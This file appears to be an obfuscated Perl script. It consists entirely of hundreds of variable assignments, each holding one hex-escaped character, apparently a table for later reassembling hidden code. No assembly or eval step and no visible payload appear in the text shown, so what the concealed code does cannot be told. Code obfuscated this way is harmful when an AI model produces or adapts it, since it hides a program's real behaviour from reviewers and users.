$fkoi1389="\x09";
$fkoi1111="\x61";$fkoi237="\x67";
$fkoi1397="\x67";$fkoi1015="\x24";$fkoi315="\x28";$fkoi386="\x31";
$fkoi1679="\x3b";$fkoi398="\x69";
$fkoi498="\x20";$fkoi1456="\x0a";$fkoi1454="\x0a";
$fkoi328="\x20";
$fkoi473="\x09";$fkoi1523="\x6f";$fkoi1497="\x79";$fkoi977="\x7d";$fkoi169="\x66";$fkoi1392="\x73";$fkoi274="\x65";$fkoi1105="\x73";$fkoi992="\x24";$fkoi1495="\x6e";$fkoi973="\x29";$fkoi471="\x64";$fkoi781="\x29";$fkoi1313="\x6d";$fkoi732="\x70";
$fkoi1407="\x74";
$fkoi120="\x6c";$fkoi1045="\x09";$fkoi1534="\x73";$fkoi493="\x62";$fkoi892="\x24";$fkoi1674="\x6f";$fkoi365="\x74";$fkoi1244="\x61";$fkoi7="\x70";$fkoi1577="\x6c";$fkoi1118="\x75";$fkoi934="\x20";$fkoi1318="\x20";$fkoi288="\x68";
$fkoi434="\x74";
$fkoi1568="\x78";$fkoi768="\x20";$fkoi596="\x28";
$fkoi1209="\x78";$fkoi649="\x24";$fkoi298="\x20";$fkoi433="\x70";
$fkoi1117="\x68";$fkoi96="\x20";$fkoi805="\x63";$fkoi1376="\x20";$fkoi757="\x22";$fkoi382="\x24";
$fkoi75="\x65";$fkoi752="\x3d";$fkoi633="\x20";$fkoi1464="\x20";
$fkoi1315="\x20";$fkoi1144="\x5f";
$fkoi1205="\x09";$fkoi924="\x09";$fkoi1102="\x20";$fkoi295="\x69";$fkoi294="\x75";$fkoi287="\x77";$fkoi833="\x20";
$fkoi271="\x20";$fkoi1224="\x0a";$fkoi1593="\x6f";$fkoi1514="\x20";$fkoi300="\x68";$fkoi119="\x6c";$fkoi1559="\x67";$fkoi904="\x24";$fkoi388="\x3b";
$fkoi1359="\x20";$fkoi424="\x6d";
$fkoi1162="\x24";$fkoi1595="\x70";$fkoi1621="\x2c";$fkoi1476="\x65";$fkoi66="\x23";$fkoi1106="\x68";$fkoi1383="\x24";$fkoi1447="\x73";$fkoi861="\x20";$fkoi843="\x72";
$fkoi12="\x20";$fkoi1651="\x74";$fkoi723="\x6f";$fkoi395="\x68";$fkoi577="\x5f";
$fkoi1690="\x2b";$fkoi677="\x24";$fkoi1432="\x29";$fkoi945="\x24";$fkoi159="\x63";$fkoi1179="\x79";$fkoi291="\x68";$fkoi185="\x09";$fkoi14="\x65";
$fkoi705="\x6d";$fkoi425="\x69";$fkoi78="\x72";$fkoi1107="\x65";
$fkoi1425="\x32";$fkoi1612="\x63";$fkoi1046="\x24";$fkoi316="\x24";$fkoi1470="\x63";$fkoi877="\x69";$fkoi229="\x65";$fkoi458="\x6f";$fkoi799="\x09";
$fkoi1437="\x0a";$fkoi630="\x20";$fkoi1237="\x6a";
$fkoi400="\x64";$fkoi1121="\x6c";$fkoi1097="\x0a";$fkoi998="\x72";
$fkoi849="\x3d";$fkoi716="\x73";
$fkoi444="\x65";$fkoi1596="\x68";$fkoi1634="\x24";$fkoi448="\x74";$fkoi387="\x29";$fkoi1387="\x7b";$fkoi1371="\x20";
$fkoi247="\x29";$fkoi1477="\x20";$fkoi431="\x72";$fkoi868="\x69";$fkoi113="\x76";$fkoi117="\x20";$fkoi208="\x78";
$fkoi790="\x20";
$fkoi171="\x3b";$fkoi286="\x20";$fkoi624="\x69";$fkoi778="\x28";$fkoi1095="\x7d";$fkoi1120="\x66";$fkoi1363="\x20";$fkoi68="\x63";$fkoi626="\x3d";$fkoi1152="\x28";$fkoi201="\x2c";$fkoi1099="\x73";
$fkoi1658="\x0a";$fkoi31="\x20";$fkoi797="\x0a";
$fkoi199="\x28";$fkoi207="\x65";$fkoi794="\x0a";$fkoi1033="\x61";
$fkoi100="\x20";$fkoi614="\x22";
$fkoi1029="\x3d";$fkoi1248="\x6a";$fkoi158="\x24";$fkoi1519="\x72";$fkoi1047="\x6d";
$fkoi1547="\x65";$fkoi901="\x20";$fkoi181="\x20";$fkoi233="\x24";$fkoi867="\x24";$fkoi1086="\x20";
$fkoi1098="\x0a";$fkoi1475="\x76";$fkoi1035="\x5f";
$fkoi936="\x5c";$fkoi940="\x69";$fkoi180="\x3d";$fkoi1438="\x09";
$fkoi303="\x73";$fkoi685="\x5c";$fkoi1084="\x72";$fkoi376="\x63";
$fkoi1668="\x6e";$fkoi1603="\x0a";
$fkoi1129="\x20";
$fkoi1636="\x61";
$fkoi1600="\x63";$fkoi801="\x20";$fkoi1264="\x69";
$fkoi1404="\x72";$fkoi834="\x2e";
$fkoi517="\x0a";$fkoi494="\x75";
$fkoi327="\x3c";
$fkoi739="\x29";
$fkoi336="\x24";$fkoi966="\x29";$fkoi1560="\x72";$fkoi413="\x0a";$fkoi1696="\x65";$fkoi784="\x29";$fkoi1413="\x22";
$fkoi854="\x66";$fkoi943="\x28";
$fkoi182="\x30";$fkoi1399="\x2e";$fkoi1127="\x6d";
$fkoi1417="\x6e";$fkoi1418="\x74";$fkoi1074="\x22";$fkoi1483="\x20";$fkoi690="\x32";$fkoi416="\x09";$fkoi1698="\x61";$fkoi1003="\x65";$fkoi651="\x29";$fkoi1424="\x28";$fkoi1574="\x74";$fkoi1013="\x0a";
$fkoi1408="\x66";$fkoi1317="\x6c";$fkoi1142="\x20";$fkoi762="\x28";
$fkoi683="\x5c";$fkoi1063="\x24";$fkoi427="\x65";
$fkoi116="\x2c";$fkoi1401="\x20";$fkoi366="\x2c";$fkoi862="\x3d";$fkoi1016="\x6d";$fkoi653="\x7b";
$fkoi899="\x2e";$fkoi1068="\x5f";$fkoi1630="\x72";$fkoi65="\x0a";$fkoi946="\x69";$fkoi1434="\x0a";$fkoi696="\x2c";$fkoi533="\x68";$fkoi32="\x65";$fkoi24="\x6f";$fkoi735="\x24";$fkoi802="\x63";
$fkoi823="\x6e";$fkoi1115="\x5f";$fkoi234="\x24";$fkoi1623="\x3e";$fkoi383="\x69";$fkoi244="\x69";$fkoi1011="\x3b";
$fkoi135="\x64";$fkoi162="\x65";$fkoi130="\x76";$fkoi1565="\x67";$fkoi108="\x72";$fkoi215="\x29";$fkoi265="\x72";
$fkoi204="\x69";
$fkoi408="\x69";$fkoi1253="\x5d";$fkoi610="\x20";
$fkoi18="\x63";$fkoi806="\x75";$fkoi1301="\x64";$fkoi556="\x78";
$fkoi937="\x6e";$fkoi289="\x69";$fkoi1177="\x09";$fkoi1146="\x0a";$fkoi142="\x6d";$fkoi1202="\x29";$fkoi520="\x69";$fkoi958="\x64";$fkoi1173="\x20";$fkoi501="\x72";$fkoi1672="\x63";$fkoi1540="\x74";$fkoi855="\x6f";$fkoi509="\x64";$fkoi582="\x20";$fkoi1278="\x24";$fkoi688="\x25";
$fkoi591="\x74";$fkoi1346="\x6e";$fkoi1539="\x20";
$fkoi1372="\x24";$fkoi1468="\x72";$fkoi344="\x2b";$fkoi1429="\x39";$fkoi749="\x65";$fkoi1587="\x20";
$fkoi910="\x6e";$fkoi446="\x70";$fkoi1576="\x61";$fkoi882="\x2b";$fkoi1358="\x72";$fkoi817="\x29";$fkoi607="\x6f";
$fkoi255="\x75";$fkoi43="\x32";$fkoi787="\x20";
$fkoi1627="\x61";$fkoi318="\x20";$fkoi157="\x20";$fkoi480="\x20";$fkoi873="\x23";
$fkoi1571="\x6e";$fkoi1020="\x65";$fkoi1227="\x40";
$fkoi771="\x6e";$fkoi302="\x20";$fkoi1322="\x6e";
$fkoi1212="\x69";$fkoi585="\x72";$fkoi531="\x5f";$fkoi1255="\x0a";$fkoi1136="\x24";$fkoi1052="\x20";$fkoi1337="\x09";$fkoi146="\x6d";
$fkoi1182="\x6a";$fkoi738="\x29";$fkoi441="\x2c";$fkoi644="\x74";$fkoi1626="\x74";$fkoi34="\x67";$fkoi645="\x3b";
$fkoi1306="\x69";$fkoi213="\x20";$fkoi211="\x20";$fkoi1557="\x73";$fkoi858="\x28";$fkoi766="\x20";$fkoi1241="\x20";$fkoi872="\x24";$fkoi1558="\x20";$fkoi1667="\x24";
$fkoi1256="\x09";
$fkoi338="\x6f";
$fkoi701="\x72";$fkoi1368="\x20";
$fkoi597="\x29";
$fkoi1689="\x0a";$fkoi1293="\x0a";$fkoi329="\x6c";
$fkoi176="\x20";$fkoi1628="\x6d";
$fkoi1333="\x2b";$fkoi1361="\x6d";$fkoi502="\x72";$fkoi1357="\x6f";$fkoi1394="\x72";$fkoi220="\x73";$fkoi1110="\x79";$fkoi305="\x72";$fkoi1171="\x3b";$fkoi1561="\x6f";
$fkoi107="\x20";$fkoi145="\x61";$fkoi1654="\x6e";$fkoi1088="\x6d";
$fkoi1004="\x2e";$fkoi1688="\x3b";$fkoi93="\x6e";$fkoi623="\x24";$fkoi699="\x76";$fkoi30="\x67";$fkoi1604="\x70";$fkoi1614="\x0a";
$fkoi1694="\x65";
$fkoi39="\x28";$fkoi112="\x72";$fkoi1471="\x75";$fkoi761="\x20";$fkoi170="\x74";$fkoi551="\x40";$fkoi1441="\x74";$fkoi125="\x74";$fkoi942="\x20";$fkoi143="\x65";$fkoi729="\x63";$fkoi414="\x0a";$fkoi1236="\x24";$fkoi1238="\x5d";$fkoi1374="\x20";$fkoi1360="\x28";$fkoi1499="\x63";$fkoi932="\x2e";
$fkoi871="\x20";
$fkoi552="\x69";$fkoi1298="\x72";$fkoi793="\x3b";$fkoi350="\x7b";
$fkoi559="\x29";$fkoi99="\x6c";$fkoi429="\x73";$fkoi1093="\x3b";
$fkoi1556="\x69";$fkoi625="\x20";$fkoi1126="\x09";$fkoi148="\x72";$fkoi935="\x22";$fkoi88="\x65";$fkoi706="\x65";$fkoi79="\x61";
$fkoi905="\x24";$fkoi86="\x20";$fkoi648="\x2b";$fkoi544="\x72";
$fkoi1270="\x20";$fkoi127="\x20";
$fkoi1362="\x79";$fkoi1715="\x0a";$fkoi747="\x6f";$fkoi1137="\x61";
$fkoi98="\x6c";$fkoi59="\x72";
$fkoi152="\x7b";$fkoi478="\x65";$fkoi1416="\x69";$fkoi692="\x5c";$fkoi1640="\x61";$fkoi1178="\x6d";$fkoi1606="\x69";$fkoi1493="\x20";$fkoi919="\x2e";$fkoi698="\x24";$fkoi27="\x68";$fkoi832="\x65";$fkoi385="\x20";$fkoi1435="\x09";$fkoi654="\x0a";$fkoi1713="\x3b";$fkoi715="\x65";$fkoi815="\x6c";
$fkoi1685="\x6e";$fkoi1160="\x20";$fkoi727="\x24";$fkoi324="\x24";
$fkoi1245="\x31";$fkoi16="\x6c";
$fkoi77="\x65";$fkoi379="\x65";$fkoi827="\x24";
$fkoi1538="\x65";
$fkoi848="\x65";$fkoi38="\x20";
$fkoi819="\x73";$fkoi1592="\x6d";$fkoi1444="\x6e";$fkoi1259="\x24";
$fkoi812="\x65";$fkoi1320="\x20";$fkoi1091="\x64";$fkoi1128="\x79";$fkoi495="\x69";$fkoi1711="\x6e";$fkoi1207="\x6e";$fkoi272="\x74";$fkoi1517="\x6e";$fkoi260="\x61";$fkoi1321="\x69";$fkoi820="\x74";$fkoi608="\x64";$fkoi695="\x22";$fkoi299="\x74";$fkoi970="\x3d";$fkoi1190="\x72";$fkoi1023="\x3d";$fkoi218="\x0a";$fkoi1618="\x6e";$fkoi1269="\x5d";
$fkoi743="\x09";$fkoi1410="\x22";$fkoi1506="\x6f";$fkoi1481="\x65";$fkoi69="\x6f";
$fkoi1461="\x68";$fkoi67="\x20";$fkoi1076="\x0a";$fkoi109="\x65";$fkoi1446="\x24";$fkoi964="\x31";$fkoi1028="\x63";$fkoi487="\x63";$fkoi643="\x70";$fkoi348="\x29";$fkoi773="\x28";$fkoi917="\x24";
$fkoi1579="\x3a";$fkoi981="\x6d";$fkoi426="\x7a";$fkoi594="\x6e";$fkoi149="\x70";$fkoi1487="\x6e";
$fkoi1552="\x65";$fkoi1409="\x28";
$fkoi1290="\x7d";$fkoi1572="\x65";$fkoi734="\x5b";$fkoi140="\x62";$fkoi1412="\x63";$fkoi709="\x24";$fkoi90="\x73";$fkoi50="\x62";$fkoi263="\x61";$fkoi744="\x24";$fkoi73="\x20";$fkoi1135="\x20";
$fkoi879="\x74";
$fkoi1048="\x63";$fkoi246="\x6e";$fkoi1610="\x24";
$fkoi776="\x6e";$fkoi840="\x24";$fkoi900="\x3d";$fkoi1348="\x20";
$fkoi309="\x0a";$fkoi957="\x6e";$fkoi1211="\x20";$fkoi1036="\x6e";$fkoi938="\x22";$fkoi786="\x29";$fkoi443="\x6b";$fkoi1643="\x2d";
$fkoi1480="\x64";$fkoi320="\x20";$fkoi884="\x24";$fkoi1043="\x3b";
$fkoi1511="\x65";$fkoi257="\x6c";$fkoi285="\x73";$fkoi313="\x72";$fkoi1150="\x72";
$fkoi1687="\x22";$fkoi1235="\x20";$fkoi718="\x24";$fkoi360="\x73";$fkoi638="\x23";
$fkoi512="\x6c";$fkoi959="\x28";
$fkoi223="\x6e";$fkoi1489="\x20";$fkoi1172="\x29";$fkoi764="\x24";$fkoi1141="\x3d";$fkoi358="\x20";$fkoi1460="\x74";$fkoi1338="\x6d";
$fkoi664="\x2e";$fkoi1415="\x20";$fkoi55="\x61";$fkoi826="\x09";$fkoi325="\x69";$fkoi989="\x20";$fkoi1439="\x72";$fkoi219="\x09";$fkoi1026="\x5c";$fkoi1586="\x3d";$fkoi666="\x20";$fkoi1498="\x20";$fkoi15="\x72";$fkoi1419="\x28";$fkoi1154="\x79";
$fkoi894="\x63";$fkoi1289="\x0a";$fkoi1267="\x24";$fkoi273="\x68";$fkoi1422="\x6e";$fkoi578="\x6e";$fkoi1709="\x20";$fkoi417="\x23";$fkoi1507="\x6d";
$fkoi1233="\x69";$fkoi1367="\x3d";$fkoi1228="\x24";$fkoi662="\x65";
$fkoi579="\x61";$fkoi354="\x70";$fkoi1543="\x20";$fkoi1390="\x09";$fkoi1433="\x3b";
$fkoi1168="\x2d";$fkoi1531="\x6f";$fkoi1147="\x09";$fkoi1012="\x0a";$fkoi1180="\x20";$fkoi1554="\x23";$fkoi713="\x65";
$fkoi423="\x6f";$fkoi405="\x2c";$fkoi693="\x22";$fkoi1691="\x2b";$fkoi1693="\x67";$fkoi1466="\x73";$fkoi475="\x20";$fkoi341="\x29";$fkoi1644="\x24";$fkoi456="\x20";$fkoi680="\x25";$fkoi759="\x69";$fkoi1615="\x6f";$fkoi1340="\x20";
$fkoi875="\x63";$fkoi714="\x78";$fkoi1671="\x0a";$fkoi1292="\x0a";$fkoi928="\x6f";$fkoi262="\x20";
$fkoi914="\x22";$fkoi1431="\x29";$fkoi91="\x69";$fkoi1081="\x65";$fkoi450="\x61";$fkoi825="\x0a";$fkoi1589="\x65";$fkoi1629="\x6f";$fkoi1381="\x2b";$fkoi1262="\x5b";$fkoi1598="\x24";$fkoi775="\x61";$fkoi1607="\x6e";
$fkoi810="\x65";$fkoi252="\x23";$fkoi668="\x70";$fkoi818="\x20";$fkoi1316="\x24";
$fkoi611="\x3d";$fkoi1580="\x29";$fkoi737="\x5d";$fkoi1500="\x61";$fkoi190="\x73";$fkoi647="\x2b";$fkoi277="\x68";
$fkoi421="\x6e";$fkoi332="\x67";$fkoi655="\x09";$fkoi535="\x66";$fkoi474="\x23";
$fkoi1594="\x72";$fkoi1285="\x3b";$fkoi652="\x20";$fkoi1388="\x0a";$fkoi1061="\x20";$fkoi235="\x2a";
$fkoi876="\x72";$fkoi605="\x6d";$fkoi995="\x24";$fkoi1502="\x0a";$fkoi439="\x61";$fkoi546="\x70";$fkoi557="\x65";$fkoi1104="\x69";$fkoi1101="\x62";$fkoi188="\x20";$fkoi1080="\x72";$fkoi410="\x0a";
$fkoi310="\x09";$fkoi369="\x75";$fkoi505="\x74";$fkoi178="\x69";$fkoi1000="\x6e";
$fkoi997="\x61";
$fkoi236="\x24";$fkoi968="\x20";$fkoi635="\x3d";$fkoi123="\x65";$fkoi918="\x69";$fkoi254="\x62";
$fkoi353="\x09";$fkoi485="\x65";$fkoi1030="\x27";$fkoi659="\x63";$fkoi561="\x0a";$fkoi898="\x20";$fkoi245="\x6f";$fkoi438="\x72";
$fkoi92="\x6f";$fkoi1575="\x69";$fkoi1631="\x70";$fkoi1082="\x74";
$fkoi1331="\x29";$fkoi163="\x20";$fkoi568="\x20";$fkoi1494="\x6f";$fkoi198="\x20";$fkoi988="\x3d";$fkoi941="\x66";$fkoi896="\x64";$fkoi1254="\x3b";$fkoi1044="\x0a";$fkoi1704="\x0a";$fkoi726="\x28";
$fkoi1="\x20";
$fkoi562="\x0a";$fkoi513="\x61";$fkoi83="\x6e";$fkoi293="\x62";$fkoi153="\x0a";
$fkoi1660="\x72";$fkoi702="\x5f";$fkoi114="\x65";
$fkoi909="\x5f";$fkoi1070="\x61";$fkoi1664="\x20";$fkoi136="\x2e";$fkoi930="\x65";$fkoi779="\x32";$fkoi1151="\x20";
$fkoi1578="\x20";$fkoi1666="\x20";
$fkoi306="\x69";$fkoi537="\x6c";$fkoi792="\x29";$fkoi1008="\x22";$fkoi1161="\x40";$fkoi42="\x20";
$fkoi261="\x6e";$fkoi1069="\x6e";$fkoi1090="\x6f";
$fkoi795="\x09";$fkoi1701="\x6f";
$fkoi845="\x6e";$fkoi1569="\x70";$fkoi1153="\x6d";$fkoi8="\x65";
$fkoi151="\x0a";$fkoi167="\x68";$fkoi189="\x40";$fkoi1109="\x5f";$fkoi85="\x31";$fkoi29="\x6e";$fkoi742="\x09";$fkoi1647="\x6e";$fkoi491="\x72";$fkoi243="\x74";$fkoi297="\x64";
$fkoi330="\x65";$fkoi455="\x6e";$fkoi1515="\x67";$fkoi1041="\x3b";$fkoi869="\x20";$fkoi1649="\x72";$fkoi242="\x61";
$fkoi593="\x69";$fkoi519="\x66";$fkoi754="\x22";$fkoi25="\x72";$fkoi1673="\x6c";$fkoi266="\x61";$fkoi1702="\x6e";$fkoi575="\x61";$fkoi483="\x20";
$fkoi1291="\x0a";
$fkoi370="\x62";$fkoi46="\x39";$fkoi1386="\x20";$fkoi536="\x66";
$fkoi767="\x25";
$fkoi782="\x2b";$fkoi847="\x6d";$fkoi613="\x22";
$fkoi1324="\x28";$fkoi342="\x3b";
$fkoi921="\x3b";$fkoi1635="\x76";$fkoi978="\x0a";
$fkoi1247="\x24";$fkoi101="\x72";$fkoi866="\x20";$fkoi587="\x6e";$fkoi933="\x3d";$fkoi282="\x74";$fkoi87="\x76";$fkoi202="\x20";$fkoi1263="\x24";$fkoi1570="\x6f";
$fkoi1310="\x7b";$fkoi1252="\x69";$fkoi1380="\x20";$fkoi841="\x76";
$fkoi1125="\x0a";$fkoi484="\x77";
$fkoi1193="\x64";$fkoi447="\x20";$fkoi1700="\x69";$fkoi407="\x24";
$fkoi1143="\x40";$fkoi967="\x29";$fkoi1197="\x20";$fkoi1108="\x72";$fkoi1656="\x29";$fkoi1196="\x69";
$fkoi1314="\x79";$fkoi636="\x20";$fkoi469="\x6c";$fkoi1226="\x09";$fkoi800="\x23";$fkoi3="\x6f";$fkoi814="\x61";$fkoi1599="\x24";$fkoi1213="\x66";
$fkoi925="\x24";$fkoi686="\x5c";$fkoi1382="\x2b";$fkoi658="\x6d";$fkoi1123="\x0a";
$fkoi1652="\x69";$fkoi1017="\x63";
$fkoi22="\x20";$fkoi1056="\x22";$fkoi852="\x0a";$fkoi1325="\x72";$fkoi1050="\x64";$fkoi558="\x73";$fkoi380="\x2c";
$fkoi238="\x65";
$fkoi885="\x69";$fkoi1343="\x74";$fkoi538="\x65";$fkoi1486="\x61";
$fkoi600="\x09";$fkoi94="\x0a";
$fkoi865="\x3b";$fkoi270="\x66";$fkoi1617="\x65";$fkoi913="\x65";$fkoi1492="\x75";$fkoi1103="\x66";
$fkoi711="\x6e";$fkoi1089="\x63";
$fkoi1520="\x61";
$fkoi1567="\x65";$fkoi1059="\x61";$fkoi321="\x30";$fkoi725="\x64";$fkoi770="\x69";$fkoi1132="\x61";$fkoi1169="\x24";$fkoi822="\x69";$fkoi763="\x28";$fkoi733="\x74";
$fkoi1522="\x69";$fkoi809="\x74";$fkoi1692="\x24";$fkoi172="\x0a";$fkoi9="\x61";$fkoi1536="\x6e";$fkoi312="\x6f";
$fkoi1335="\x3b";$fkoi477="\x68";$fkoi555="\x65";$fkoi543="\x63";$fkoi36="\x6e";$fkoi1246="\x5b";
$fkoi1260="\x61";$fkoi1311="\x0a";$fkoi1279="\x6a";
$fkoi521="\x73";$fkoi186="\x6d";$fkoi1176="\x09";$fkoi1299="\x61";$fkoi227="\x69";$fkoi746="\x63";$fkoi84="\x2d";$fkoi1031="\x24";$fkoi672="\x74";$fkoi996="\x76";$fkoi835="\x3d";
$fkoi1545="\x6f";$fkoi231="\x29";
$fkoi1395="\x69";$fkoi1533="\x20";$fkoi133="\x73";$fkoi1479="\x6f";$fkoi1001="\x61";$fkoi1323="\x74";
$fkoi671="\x6e";$fkoi26="\x70";
$fkoi708="\x20";$fkoi542="\x73";
$fkoi796="\x7d";$fkoi657="\x24";$fkoi195="\x74";
$fkoi179="\x20";$fkoi583="\x3d";$fkoi1526="\x20";$fkoi334="\x68";$fkoi999="\x5f";$fkoi1344="\x72";$fkoi620="\x72";$fkoi755="\x5c";$fkoi1529="\x20";
$fkoi301="\x65";$fkoi741="\x0a";$fkoi1330="\x33";$fkoi907="\x61";
$fkoi731="\x69";$fkoi617="\x09";$fkoi859="\x24";$fkoi1710="\x24";$fkoi445="\x65";$fkoi669="\x72";$fkoi89="\x72";$fkoi1005="\x24";$fkoi1217="\x20";$fkoi976="\x09";
$fkoi678="\x25";$fkoi319="\x3d";
$fkoi63="\x65";$fkoi604="\x24";$fkoi850="\x22";
$fkoi831="\x64";$fkoi576="\x72";$fkoi226="\x74";
$fkoi1516="\x65";$fkoi627="\x20";$fkoi466="\x75";$fkoi335="\x28";$fkoi1018="\x6f";$fkoi1249="\x2c";$fkoi756="\x6e";$fkoi1342="\x73";$fkoi499="\x63";$fkoi453="\x20";$fkoi503="\x65";$fkoi590="\x73";$fkoi1591="\x61";$fkoi1553="\x0a";
$fkoi81="\x69";$fkoi953="\x74";$fkoi267="\x79";$fkoi1062="\x5c";$fkoi893="\x6d";$fkoi667="\x73";$fkoi563="\x09";$fkoi48="\x53";
$fkoi224="\x64";
$fkoi1250="\x20";$fkoi1188="\x74";$fkoi1423="\x64";$fkoi206="\x64";$fkoi1405="\x69";$fkoi362="\x72";$fkoi1646="\x65";$fkoi1563="\x69";$fkoi663="\x20";$fkoi1581="\x0a";$fkoi347="\x69";$fkoi106="\x73";$fkoi1421="\x61";
$fkoi1622="\x22";$fkoi1266="\x20";
$fkoi62="\x6d";$fkoi1403="\x70";$fkoi1027="\x24";
$fkoi1309="\x0a";
$fkoi528="\x74";$fkoi1378="\x6c";$fkoi589="\x5f";$fkoi571="\x0a";$fkoi1356="\x66";$fkoi539="\x28";$fkoi139="\x75";$fkoi205="\x6e";$fkoi728="\x73";$fkoi373="\x72";$fkoi956="\x61";$fkoi1230="\x31";
$fkoi1451="\x6e";$fkoi639="\x73";
$fkoi184="\x0a";$fkoi897="\x65";$fkoi1509="\x75";$fkoi838="\x5c";
$fkoi1073="\x3b";$fkoi1039="\x65";$fkoi131="\x65";$fkoi442="\x20";
$fkoi603="\x20";
$fkoi1616="\x70";$fkoi496="\x6c";$fkoi1449="\x72";$fkoi574="\x76";
$fkoi1379="\x3b";$fkoi239="\x6e";$fkoi1243="\x24";
$fkoi1138="\x32";$fkoi1010="\x22";$fkoi364="\x70";$fkoi105="\x74";$fkoi1583="\x6e";$fkoi1189="\x28";$fkoi1186="\x69";$fkoi168="\x69";$fkoi1605="\x72";$fkoi460="\x20";
$fkoi1002="\x6d";$fkoi57="\x20";$fkoi740="\x3b";$fkoi1055="\x20";$fkoi64="\x72";
$fkoi1156="\x24";$fkoi874="\x73";$fkoi276="\x63";
$fkoi808="\x61";$fkoi980="\x24";$fkoi948="\x25";$fkoi560="\x3b";
$fkoi889="\x0a";$fkoi584="\x20";
$fkoi212="\x3d";$fkoi687="\x78";$fkoi349="\x20";
$fkoi1676="\x65";$fkoi566="\x20";$fkoi187="\x79";$fkoi1510="\x74";$fkoi1467="\x20";
$fkoi1642="\x65";
$fkoi974="\x3b";$fkoi524="\x72";$fkoi916="\x22";$fkoi853="\x09";$fkoi944="\x28";$fkoi1682="\x63";$fkoi481="\x73";$fkoi1231="\x5b";$fkoi52="\x73";
$fkoi1524="\x6e";$fkoi881="\x20";$fkoi241="\x72";$fkoi1303="\x73";$fkoi352="\x09";$fkoi1501="\x6e";$fkoi721="\x2c";$fkoi1067="\x72";$fkoi17="\x20";$fkoi209="\x65";$fkoi402="\x78";$fkoi1442="\x75";$fkoi5="\x65";$fkoi1505="\x63";$fkoi1087="\x24";$fkoi1609="\x20";$fkoi745="\x6d";$fkoi1528="\x72";$fkoi939="\x20";$fkoi1465="\x69";$fkoi1166="\x20";
$fkoi1428="\x2b";
$fkoi0="\x23";$fkoi1208="\x65";$fkoi359="\x40";$fkoi1288="\x7d";$fkoi1339="\x79";
$fkoi1440="\x65";$fkoi308="\x74";$fkoi137="\x0a";$fkoi887="\x20";$fkoi1037="\x61";$fkoi1608="\x74";$fkoi465="\x68";$fkoi356="\x73";$fkoi1573="\x6e";$fkoi122="\x6c";$fkoi1705="\x65";$fkoi1130="\x28";$fkoi1225="\x09";$fkoi704="\x61";$fkoi1165="\x3b";$fkoi476="\x74";$fkoi1366="\x20";$fkoi1277="\x5b";$fkoi599="\x0a";$fkoi1472="\x72";
$fkoi1276="\x32";
$fkoi72="\x74";$fkoi969="\x3d";$fkoi154="\x09";$fkoi516="\x72";
$fkoi70="\x6e";
$fkoi673="\x66";$fkoi56="\x6e";$fkoi1707="\x61";$fkoi993="\x22";$fkoi1473="\x73";$fkoi694="\x3b";$fkoi33="\x6e";
$fkoi468="\x66";$fkoi1327="\x6e";$fkoi545="\x69";
$fkoi1678="\x4f";$fkoi222="\x61";$fkoi281="\x63";$fkoi965="\x29";$fkoi1215="\x24";$fkoi646="\x20";$fkoi304="\x63";$fkoi40="\x43";$fkoi619="\x6f";$fkoi490="\x20";$fkoi192="\x72";
$fkoi515="\x65";
$fkoi1398="\x20";$fkoi488="\x61";$fkoi1637="\x72";
$fkoi449="\x72";$fkoi1286="\x0a";$fkoi1280="\x2c";$fkoi1420="\x72";$fkoi1518="\x65";$fkoi803="\x61";$fkoi844="\x5f";$fkoi1590="\x74";$fkoi264="\x72";$fkoi166="\x73";$fkoi1532="\x2c";$fkoi915="\x2e";$fkoi923="\x09";$fkoi210="\x73";$fkoi249="\x0a";$fkoi216="\x3b";$fkoi351="\x0a";$fkoi391="\x09";
$fkoi1345="\x69";
$fkoi864="\x30";$fkoi637="\x24";$fkoi1601="\x29";$fkoi1065="\x76";$fkoi377="\x6f";$fkoi927="\x63";$fkoi1139="\x29";$fkoi58="\x4b";$fkoi399="\x6e";$fkoi1463="\x73";$fkoi618="\x66";
$fkoi888="\x7b";
$fkoi1134="\x2c";$fkoi435="\x20";
$fkoi160="\x6f";
$fkoi631="\x24";$fkoi1304="\x74";$fkoi830="\x6f";$fkoi403="\x65";$fkoi1369="\x30";$fkoi534="\x75";$fkoi147="\x6f";$fkoi20="\x64";
$fkoi126="\x73";$fkoi960="\x32";$fkoi1329="\x28";
$fkoi1677="\x20";$fkoi1072="\x65";
$fkoi813="\x76";
$fkoi1530="\x73";$fkoi1133="\x31";$fkoi1659="\x70";$fkoi191="\x63";$fkoi846="\x61";$fkoi1283="\x69";$fkoi437="\x72";$fkoi54="\x69";$fkoi789="\x3d";$fkoi283="\x65";$fkoi1060="\x6c";$fkoi1116="\x73";
$fkoi333="\x74";$fkoi1597="\x28";$fkoi1370="\x3b";
$fkoi37="\x65";$fkoi401="\x65";$fkoi1427="\x29";$fkoi798="\x0a";$fkoi1326="\x61";
$fkoi1210="\x74";$fkoi1308="\x67";$fkoi532="\x73";$fkoi230="\x28";$fkoi396="\x20";
$fkoi1032="\x76";
$fkoi1265="\x2c";$fkoi1445="\x20";$fkoi323="\x20";$fkoi1064="\x24";
$fkoi717="\x5b";$fkoi987="\x2e";$fkoi412="\x7d";$fkoi1681="\x24";$fkoi1251="\x24";
$fkoi177="\x24";
$fkoi1305="\x72";$fkoi1657="\x3b";$fkoi908="\x72";
$fkoi1075="\x3b";$fkoi985="\x65";$fkoi860="\x69";
$fkoi1384="\x69";$fkoi1157="\x69";$fkoi1174="\x7b";$fkoi128="\x72";
$fkoi47="\x20";
$fkoi1336="\x0a";$fkoi1302="\x5f";$fkoi467="\x66";
$fkoi1158="\x20";$fkoi440="\x79";
$fkoi357="\x68";$fkoi1096="\x0a";$fkoi200="\x29";$fkoi60="\x61";$fkoi824="\x67";
$fkoi165="\x20";$fkoi1218="\x3d";$fkoi464="\x73";
$fkoi275="\x20";$fkoi1648="\x65";
$fkoi1258="\x40";$fkoi129="\x65";
$fkoi660="\x6f";$fkoi991="\x5c";$fkoi1184="\x3d";$fkoi1332="\x29";$fkoi1273="\x40";$fkoi650="\x69";$fkoi462="\x65";$fkoi104="\x68";$fkoi361="\x63";$fkoi710="\x69";
$fkoi983="\x6f";$fkoi595="\x67";$fkoi250="\x0a";$fkoi367="\x20";
$fkoi1021="\x20";$fkoi1602="\x3b";$fkoi642="\x69";
$fkoi586="\x61";$fkoi1703="\x3b";
$fkoi337="\x63";$fkoi523="\x65";$fkoi454="\x6f";$fkoi1079="\x09";
$fkoi258="\x64";
$fkoi880="\x3b";$fkoi1411="\x25";$fkoi530="\x73";$fkoi1200="\x31";$fkoi1365="\x69";$fkoi758="\x20";
$fkoi164="\x3d";$fkoi397="\x40";
$fkoi982="\x63";
